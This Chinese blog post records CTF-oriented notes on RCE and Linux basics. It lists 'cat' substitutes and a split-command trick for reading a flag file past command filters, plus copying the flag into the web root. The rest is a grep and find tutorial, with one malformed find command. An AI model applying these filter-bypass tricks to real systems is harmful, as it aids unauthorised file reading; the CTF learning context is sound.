

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/3.png">
  <link rel="icon" href="/img/3.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="AzumiSaki">
  <meta name="keywords" content="">
  
    <meta name="description" content="前言首先rce的实质就是在系统上运行恶意代码，大部分主流系统都是Linux，也有ubuntu，Windows的，但是很少见 首先在CTF的场景下对于“cat”指令的绕过123456789101112131415161718192021&#96;more&#96;:一页一页的显示档案内容 more &#x2F;tmp&#x2F;flag.txt&#96;less&#96;:与 more 类似 less &#x2F;tmp&#x2F;flag.txt&#96;head&#96;:查看头几">
<meta property="og:type" content="article">
<meta property="og:title" content="记录一次RCE的学习和有关Linux基础指令学习">
<meta property="og:url" content="https://azumisaki.github.io/2026/04/14/rce/index.html">
<meta property="og:site_name" content="Sakiの博客">
<meta property="og:description" content="前言首先rce的实质就是在系统上运行恶意代码，大部分主流系统都是Linux，也有ubuntu，Windows的，但是很少见 首先在CTF的场景下对于“cat”指令的绕过123456789101112131415161718192021&#96;more&#96;:一页一页的显示档案内容 more &#x2F;tmp&#x2F;flag.txt&#96;less&#96;:与 more 类似 less &#x2F;tmp&#x2F;flag.txt&#96;head&#96;:查看头几">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://azumisaki.github.io/img/11.JPG">
<meta property="article:published_time" content="2026-04-14T07:29:49.000Z">
<meta property="article:modified_time" content="2026-04-14T11:14:40.952Z">
<meta property="article:author" content="AzumiSaki">
<meta property="article:tag" content="-RCE漏洞">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://azumisaki.github.io/img/11.JPG">
  
  
  
  <title>记录一次RCE的学习和有关Linux基础指令学习 - Sakiの博客</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"azumisaki.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  



  
<!-- hexo injector head_end start --><link rel="stylesheet" href="/css/custom.css">
  <div style="text-align:center;font-size:14px;margin-top:10px;">
    <span id="runtime"></span>
  </div>
  <!-- hexo injector head_end end --><meta name="generator" content="Hexo 8.1.1"></head>


<body><!-- hexo injector body_begin start --><div id="global-fx-layer"></div><!-- hexo injector body_begin end -->
  

  <header>
    

<div class="header-inner" style="height: 100vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Saki&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/11.JPG') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.5)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="记录一次RCE的学习和有关Linux基础指令学习"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-04-14 15:29" pubdate>
          2026年4月14日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.5k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          30 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
        <div class="scroll-down-bar">
          <i class="iconfont icon-arrowdown"></i>
        </div>
      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">记录一次RCE的学习和有关Linux基础指令学习</h1>
            
              <p id="updated-time" class="note note-info" style="">
                
                  
                    本文最后更新于 2026年4月14日 晚上
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>首先rce的实质就是在系统上运行恶意代码，大部分主流系统都是Linux，也有ubuntu，Windows的，但是很少见</p>
<h2 id="首先在CTF的场景下"><a href="#首先在CTF的场景下" class="headerlink" title="首先在CTF的场景下"></a>首先在CTF的场景下</h2><h4 id="对于“cat”指令的绕过"><a href="#对于“cat”指令的绕过" class="headerlink" title="对于“cat”指令的绕过"></a>对于“cat”指令的绕过</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs bash">`more`:一页一页的显示档案内容 more /tmp/flag.txt<br>`less`:与 more 类似 less /tmp/flag.txt<br>`<span class="hljs-built_in">head</span>`:查看头几行 <span class="hljs-built_in">head</span>  /tmp/flag.txt	<br>`<span class="hljs-built_in">tac</span>`:从最后一行开始显示，可以看出 <span class="hljs-built_in">tac</span> 是 <span class="hljs-built_in">cat</span> 的反向显示 <span class="hljs-built_in">tac</span>  /tmp/flag.txt	<br>`<span class="hljs-built_in">tail</span>`:查看尾几行 <span class="hljs-built_in">tail</span> /tmp/flag.txt		<br>`<span class="hljs-built_in">nl</span>`：显示的时候，顺便输出行号<span class="hljs-built_in">nl</span> /tmp/flag.txt<br>`<span class="hljs-built_in">od</span>`:以二进制的方式读取档案内容 	<br>`vi`:一种编辑器，这个也可以查看		<br>`vim`:一种编辑器，这个也可以查看	<br>`<span class="hljs-built_in">sort</span>`:可以查看	<span class="hljs-built_in">sort</span> /tmp/flag.txt	<br>`<span class="hljs-built_in">uniq</span>`:可以查看<span class="hljs-built_in">uniq</span> /tmp/flag.txt<br>`xxd`:查看原始文件 xxd /tmp/flag.txt<br>`看文件头<br>判断文件真实类型特别有用。<br>`xxd -l 16 文件名`<br>常见文件头：<br>PNG: 89 50 4e 47<br>JPG: ff d8 ff<br>GIF: 47 49 46 38<br>ZIP: 50 4b 03 04`<br>`c/at /tmp/f*`:大部分通杀<br></code></pre></td></tr></table></figure>

<h2 id="特殊例子"><a href="#特殊例子" class="headerlink" title="特殊例子"></a>特殊例子</h2><h4 id="cp指令"><a href="#cp指令" class="headerlink" title="cp指令:"></a>cp指令:</h4><p>顾名思义，cp就是将一个文件复制拷贝到另一个文件，默认情况下，当转移的目标目录中没有实际对象，就会在本地创造一个<br>例如：<br>cp &#x2F;tmp&#x2F;flag.txt &#x2F;var&#x2F;www&#x2F;html&#x2F;1.php</p>
<h4 id="mv指令"><a href="#mv指令" class="headerlink" title="mv指令:"></a>mv指令:</h4><p>同cp一样，mv &#x2F;tmp&#x2F;flag.txt &#x2F;var&#x2F;www&#x2F;html&#x2F;1.php</p>
<h4 id="00截断："><a href="#00截断：" class="headerlink" title="%00截断："></a>%00截断：</h4><p>这个跟文件包含扯点关系，特别的，在php文件名后缀绕过尤为常见</p>
<p><img src="/img/rce/1.png" srcset="/img/loading.gif" lazyload></p>
<h4 id="od指令"><a href="#od指令" class="headerlink" title="od指令:"></a>od指令:</h4><h5 id="od-c"><a href="#od-c" class="headerlink" title="od -c"></a>od -c</h5><p>按“字符”方式显示。</p>
<p>效果类似：</p>
<ul>
<li>普通字符直接显示</li>
<li>换行会显示成 \n</li>
</ul>
<p>这个最适合看文本文件。</p>
<h5 id="od-An"><a href="#od-An" class="headerlink" title="od -An"></a>od -An</h5><p>不显示左边那一列偏移地址。</p>
<p>这样输出会更干净。</p>
<h5 id="od-tx1"><a href="#od-tx1" class="headerlink" title="od -tx1"></a>od -tx1</h5><p>按十六进制、1字节一组显示。</p>
<p>比如 61 62 63 就对应 abc。</p>
<h5 id="od-a"><a href="#od-a" class="headerlink" title="od -a"></a>od -a</h5><p>显示字符名字，比如空格、换行之类。</p>
<h2 id="Linux常用指令"><a href="#Linux常用指令" class="headerlink" title="Linux常用指令"></a>Linux常用指令</h2><h3 id="grep指令"><a href="#grep指令" class="headerlink" title="grep指令"></a>grep指令</h3><p>一般形式</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep flag /tmp/flag.txt 意为“在/tmp/flag.txt里面抓取含有‘flag’开头的字符”<br>或者在当前目录里批量查找<br>grep -r <span class="hljs-string">&quot;flag&quot;</span><br></code></pre></td></tr></table></figure>

<h4 id="4-常用参数"><a href="#4-常用参数" class="headerlink" title="4. 常用参数"></a>4. 常用参数</h4><hr>
<h4 id="i-忽略大小写"><a href="#i-忽略大小写" class="headerlink" title="-i 忽略大小写"></a><code>-i</code> 忽略大小写</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -i <span class="hljs-string">&quot;flag&quot;</span> test.txt<br></code></pre></td></tr></table></figure>

<hr>
<h4 id="n-显示行号"><a href="#n-显示行号" class="headerlink" title="-n 显示行号"></a><code>-n</code> 显示行号</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -n <span class="hljs-string">&quot;flag&quot;</span> test.txt<br></code></pre></td></tr></table></figure>

<p>输出类似：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">2:flag&#123;123&#125;<br></code></pre></td></tr></table></figure>

<p>意思是第 2 行匹配到了。这个很好用，方便定位。</p>
<hr>
<h4 id="r-递归搜索目录"><a href="#r-递归搜索目录" class="headerlink" title="-r 递归搜索目录"></a><code>-r</code> 递归搜索目录</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -r <span class="hljs-string">&quot;flag&quot;</span> .<br></code></pre></td></tr></table></figure>

<p>在当前目录下所有文件里找。也可以指定目录：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -r <span class="hljs-string">&quot;flag&quot;</span> /var/www/html<br></code></pre></td></tr></table></figure>

<hr>
<h4 id="v-反向匹配"><a href="#v-反向匹配" class="headerlink" title="-v 反向匹配"></a><code>-v</code> 反向匹配</h4><p>显示不包含某内容的行：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -v <span class="hljs-string">&quot;flag&quot;</span> test.txt<br></code></pre></td></tr></table></figure>

<p>这个命令会输出所有<strong>没有 flag</strong> 的行。</p>
<hr>
<h4 id="w-精确匹配整个单词"><a href="#w-精确匹配整个单词" class="headerlink" title="-w 精确匹配整个单词"></a><code>-w</code> 精确匹配整个单词</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -w <span class="hljs-string">&quot;cat&quot;</span> test.txt<br></code></pre></td></tr></table></figure>

<p>只匹配单词 <code>cat</code>，不会匹配其他的词</p>
<hr>
<h4 id="o-只输出匹配到的部分"><a href="#o-只输出匹配到的部分" class="headerlink" title="-o 只输出匹配到的部分"></a><code>-o</code> 只输出匹配到的部分</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -o <span class="hljs-string">&quot;flag&#123;.*&#125;&quot;</span> test.txt<br></code></pre></td></tr></table></figure>

<p>如果一整行很长，只想提取匹配部分，这个很好用。</p>
<hr>
<h4 id="E-使用扩展正则"><a href="#E-使用扩展正则" class="headerlink" title="-E 使用扩展正则"></a><code>-E</code> 使用扩展正则</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -E <span class="hljs-string">&quot;flag|key|password&quot;</span> test.txt<br></code></pre></td></tr></table></figure>

<p>意思是只匹配flag,key,password</p>
<hr>
<h3 id="5-grep-最常见的几种写法"><a href="#5-grep-最常见的几种写法" class="headerlink" title="5. grep 最常见的几种写法"></a>5. grep 最常见的几种写法</h3><p>搜文件里的关键词</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep <span class="hljs-string">&quot;flag&quot;</span> file.txt<br></code></pre></td></tr></table></figure>

<hr>
<p>搜目录里的关键词</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -r <span class="hljs-string">&quot;flag&quot;</span> .<br></code></pre></td></tr></table></figure>

<hr>
<p>显示行号</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -n <span class="hljs-string">&quot;flag&quot;</span> file.txt<br></code></pre></td></tr></table></figure>

<hr>
<p>忽略大小写</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -i <span class="hljs-string">&quot;flag&quot;</span> file.txt<br></code></pre></td></tr></table></figure>

<hr>
<p>多个关键词任选一个</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -E <span class="hljs-string">&quot;flag|key|token&quot;</span> file.txt<br></code></pre></td></tr></table></figure>

<hr>
<p>只看匹配到的内容</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -o <span class="hljs-string">&quot;flag&#123;[^&#125;]*&#125;&quot;</span> file.txt<br></code></pre></td></tr></table></figure>

<p>这个在 CTF 里尤其常见，用来直接提 flag。</p>
<hr>
<h3 id="6-正则匹配怎么理解"><a href="#6-正则匹配怎么理解" class="headerlink" title="6. 正则匹配怎么理解"></a>6. 正则匹配怎么理解</h3><p><code>grep</code> 最强的地方之一，就是可以配合正则表达式。</p>
<p>例如：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep <span class="hljs-string">&quot;flag&#123;.*&#125;&quot;</span> file.txt<br></code></pre></td></tr></table></figure>

<p>含义：</p>
<ul>
<li><code>flag{</code>：固定开头</li>
<li><code>.*</code>：任意字符，任意长度</li>
<li><code>}</code>：直到右花括号</li>
</ul>
<p>但这个写法有时会贪婪匹配太多。<br> 更稳一点的是：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -o <span class="hljs-string">&#x27;flag&#123;[^&#125;]*&#125;&#x27;</span> file.txt<br></code></pre></td></tr></table></figure>

<p>意思是：</p>
<ul>
<li><code>flag{</code> 开头</li>
<li>后面跟若干个不是 <code>}</code> 的字符</li>
<li>直到 <code>}</code> 结束</li>
</ul>
<p>这通常更适合提 flag。</p>
<hr>
<h3 id="7-跟管道一起用"><a href="#7-跟管道一起用" class="headerlink" title="7. 跟管道一起用"></a>7. 跟管道一起用</h3><p><code>grep</code> 经常和别的命令一起用。</p>
<h4 id="配合-cat"><a href="#配合-cat" class="headerlink" title="配合 cat"></a>配合 <code>cat</code></h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cat</span> file.txt | grep <span class="hljs-string">&quot;flag&quot;</span><br></code></pre></td></tr></table></figure>

<p>但一般其实可以直接写成：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep <span class="hljs-string">&quot;flag&quot;</span> file.txt<br></code></pre></td></tr></table></figure>

<p>更简洁。</p>
<hr>
<h4 id="配合-strings"><a href="#配合-strings" class="headerlink" title="配合 strings"></a>配合 <code>strings</code></h4><p>二进制文件里找可读字符串：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">strings file.bin | grep <span class="hljs-string">&quot;flag&quot;</span><br></code></pre></td></tr></table></figure>

<p>这在 CTF 很常见。</p>
<p>因为二进制不能直接 <code>grep</code> 出来时，先 <code>strings</code> 提取可打印字符串，再 <code>grep</code>。</p>
<hr>
<h4 id="配合-xxd"><a href="#配合-xxd" class="headerlink" title="配合 xxd"></a>配合 <code>xxd</code></h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">xxd file.bin | grep <span class="hljs-string">&quot;666c6167&quot;</span><br></code></pre></td></tr></table></figure>

<p>因为 <code>666c6167</code> 是 <code>flag</code> 的 hex。</p>
<hr>
<h4 id="配合-ps"><a href="#配合-ps" class="headerlink" title="配合 ps"></a>配合 <code>ps</code></h4><p>查进程：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">ps aux | grep nginx<br></code></pre></td></tr></table></figure>

<p>看有没有 <code>nginx</code> 进程。</p>
<p>但注意：经常会把 <code>grep nginx</code> 自己也查出来。</p>
<hr>
<h4 id="配合-ls"><a href="#配合-ls" class="headerlink" title="配合 ls"></a>配合 <code>ls</code></h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">ls</span> | grep <span class="hljs-string">&quot;.txt&quot;</span><br></code></pre></td></tr></table></figure>

<p>筛出 <code>.txt</code> 文件。不过更常规还是用 shell 通配符。</p>
<hr>
<h3 id="8-CTF-场景里的常用打法"><a href="#8-CTF-场景里的常用打法" class="headerlink" title="8. CTF 场景里的常用打法"></a>8. CTF 场景里的常用打法</h3><h4 id="直接找-flag"><a href="#直接找-flag" class="headerlink" title="直接找 flag"></a>直接找 flag</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -r <span class="hljs-string">&quot;flag&#123;&quot;</span> .<br></code></pre></td></tr></table></figure>

<hr>
<h4 id="提取-flag-格式"><a href="#提取-flag-格式" class="headerlink" title="提取 flag 格式"></a>提取 flag 格式</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -r -o <span class="hljs-string">&#x27;flag&#123;[^&#125;]*&#125;&#x27;</span> .<br></code></pre></td></tr></table></figure>

<p>这个会递归找当前目录，并只输出匹配到的 flag 内容。</p>
<hr>
<h4 id="在二进制里找-flag"><a href="#在二进制里找-flag" class="headerlink" title="在二进制里找 flag"></a>在二进制里找 flag</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">strings chall | grep <span class="hljs-string">&quot;flag&quot;</span><br></code></pre></td></tr></table></figure>

<p>或者：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">strings chall | grep -E <span class="hljs-string">&#x27;flag&#123;[^&#125;]*&#125;&#x27;</span><br></code></pre></td></tr></table></figure>

<hr>
<h4 id="在日志里找可疑请求"><a href="#在日志里找可疑请求" class="headerlink" title="在日志里找可疑请求"></a>在日志里找可疑请求</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep <span class="hljs-string">&quot;POST&quot;</span> access.log<br>grep <span class="hljs-string">&quot;eval&quot;</span> access.log<br>grep <span class="hljs-string">&quot;cmd&quot;</span> access.log<br>grep <span class="hljs-string">&quot;union&quot;</span> access.log<br></code></pre></td></tr></table></figure>

<hr>
<h4 id="在源码里找危险函数"><a href="#在源码里找危险函数" class="headerlink" title="在源码里找危险函数"></a>在源码里找危险函数</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -r <span class="hljs-string">&quot;eval&quot;</span> .<br>grep -r <span class="hljs-string">&quot;system&quot;</span> .<br>grep -r <span class="hljs-string">&quot;exec&quot;</span> .<br>grep -r <span class="hljs-string">&quot;assert&quot;</span> .<br>grep -r <span class="hljs-string">&quot;preg_replace&quot;</span> .<br></code></pre></td></tr></table></figure>

<p>这个在审计 PHP、Python、JS 代码时很常用。</p>
<hr>
<h3 id="9-grep-和二进制文件"><a href="#9-grep-和二进制文件" class="headerlink" title="9. grep 和二进制文件"></a>9. grep 和二进制文件</h3><p>有时 <code>grep</code> 会提示：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">Binary file matches<br></code></pre></td></tr></table></figure>

<p>因为目标文件是二进制。</p>
<p>这时可以：</p>
<h4 id="方法-1：先-strings"><a href="#方法-1：先-strings" class="headerlink" title="方法 1：先 strings"></a>方法 1：先 strings</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">strings file.bin | grep <span class="hljs-string">&quot;flag&quot;</span><br></code></pre></td></tr></table></figure>

<h4 id="方法-2：强制当文本处理"><a href="#方法-2：强制当文本处理" class="headerlink" title="方法 2：强制当文本处理"></a>方法 2：强制当文本处理</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -a <span class="hljs-string">&quot;flag&quot;</span> file.bin<br></code></pre></td></tr></table></figure>

<p><code>-a</code> 表示把二进制文件按文本看。</p>
<hr>
<h3 id="10-几个特别实用的参数组合"><a href="#10-几个特别实用的参数组合" class="headerlink" title="10. 几个特别实用的参数组合"></a>10. 几个特别实用的参数组合</h3><h4 id="只显示匹配到的文件名"><a href="#只显示匹配到的文件名" class="headerlink" title="只显示匹配到的文件名"></a>只显示匹配到的文件名</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -rl <span class="hljs-string">&quot;flag&quot;</span> .<br></code></pre></td></tr></table></figure>

<ul>
<li><code>-r</code> 递归</li>
<li><code>-l</code> 只显示文件名</li>
</ul>
<p>适合先定位哪几个文件里有目标内容。</p>
<hr>
<h4 id="显示不匹配的文件名"><a href="#显示不匹配的文件名" class="headerlink" title="显示不匹配的文件名"></a>显示不匹配的文件名</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -rL <span class="hljs-string">&quot;flag&quot;</span> .<br></code></pre></td></tr></table></figure>

<hr>
<h4 id="统计匹配次数"><a href="#统计匹配次数" class="headerlink" title="统计匹配次数"></a>统计匹配次数</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -c <span class="hljs-string">&quot;flag&quot;</span> file.txt<br></code></pre></td></tr></table></figure>

<p>输出匹配行数。</p>
<hr>
<h4 id="显示匹配前后几行"><a href="#显示匹配前后几行" class="headerlink" title="显示匹配前后几行"></a>显示匹配前后几行</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">grep -n -A 3 -B 3 <span class="hljs-string">&quot;flag&quot;</span> file.txt<br></code></pre></td></tr></table></figure>

<ul>
<li><code>-A 3</code>：后 3 行</li>
<li><code>-B 3</code>：前 3 行</li>
</ul>
<p>这个看上下文非常好用。</p>
<h3 id="find指令"><a href="#find指令" class="headerlink" title="find指令"></a>find指令</h3><h4 id="最简单的指令"><a href="#最简单的指令" class="headerlink" title="最简单的指令"></a>最简单的指令</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">find . -name <span class="hljs-string">&quot;文件名字&quot;</span> ---在当前目录查找，改变<span class="hljs-string">&#x27;.&#x27;</span>即可更换查找位置<br>find . -name <span class="hljs-string">&quot;name&quot;</span> 2&gt;/dev/null 意为忽略报错，更容易查找到关键信息<br>find . -name -iname <span class="hljs-string">&quot;name&quot;</span> 2&gt;/dev/null 意为忽略大小查找<br></code></pre></td></tr></table></figure>

<h4 id="也支持通配符"><a href="#也支持通配符" class="headerlink" title="也支持通配符"></a>也支持通配符</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">find . -name <span class="hljs-string">&quot;*.txt&quot;</span>    ---找所有 `.txt` 文件。<br></code></pre></td></tr></table></figure>

